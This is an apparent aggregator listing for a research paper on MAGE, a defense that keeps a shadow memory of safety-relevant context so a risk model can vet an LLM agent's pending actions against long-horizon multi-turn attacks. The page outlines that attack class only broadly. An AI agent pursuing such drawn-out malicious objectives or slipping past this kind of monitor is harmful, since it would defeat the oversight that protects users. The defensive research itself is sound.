MAGE: Safeguarding LLM Agents against Long-Horizon Threats via Shadow Memory

πŸ“… 2026-05-04
πŸ“ˆ Citations: 0
✨ Influential: 0
πŸ“„ PDF

career value

228K/year
πŸ€– AI Summary
This work addresses the vulnerability of large language model (LLM) agents to prolonged malicious attacks, which existing defense mechanisms struggle to mitigate effectively. The authors propose MAGE, a novel security framework that introduces a memory-based defense paradigm inspired by the β€œshadow stack” concept in systems security. MAGE incorporates a lightweight shadow memory module that continuously logs and distills critical security-related context. Before executing any action, a risk-prediction model proactively evaluates potential threats using this distilled memory. Evaluated across diverse long-horizon attack scenarios, MAGE significantly outperforms current approaches by enabling high-precision, early-stage threat detection while imposing negligible overhead on task performance, thereby establishing a new direction for securing LLM agents.
πŸ“ Abstract
As large language model (LLM)-powered agents are increasingly deployed to perform complex, real-world tasks, they face a growing class of attacks that exploit extended user-agent-environment interactions to pursue malicious objectives improbable in single-turn settings. Such long-horizon threats pose significant risks to the safe deployment of LLM agents in critical domains. In this paper, we present MAGE (Memory As Guardrail Enforcement), a novel defensive framework designed to counter a wide range of long-horizon threats. Inspired by the "shadow stack" abstraction in systems security, MAGE maintains a dedicated, safety-focused agentic memory that distills and retains safety-critical context across the agent's full execution trajectory, leveraging this shadow memory to proactively assess the risk of pending actions prior to their execution. Extensive evaluation demonstrates that MAGE substantially outperforms existing defenses across diverse long-horizon threats in detection accuracy, achieves early-stage detection for the majority of attacks, and introduces only negligible overhead to agent utility. To our best knowledge, MAGE represents the first framework to detect and mitigate long-horizon threats using an agentic memory approach, establishing a new paradigm for this critical challenge and opening promising directions for future research.
Problem

Research questions and friction points this paper is trying to address.

long-horizon threats
LLM agents
safety
adversarial attacks
agent-environment interaction
Innovation

Methods, ideas, or system contributions that make the work stand out.

shadow memory
long-horizon threats
LLM agents
safety enforcement
agentic memory
πŸ’Ό Related Jobs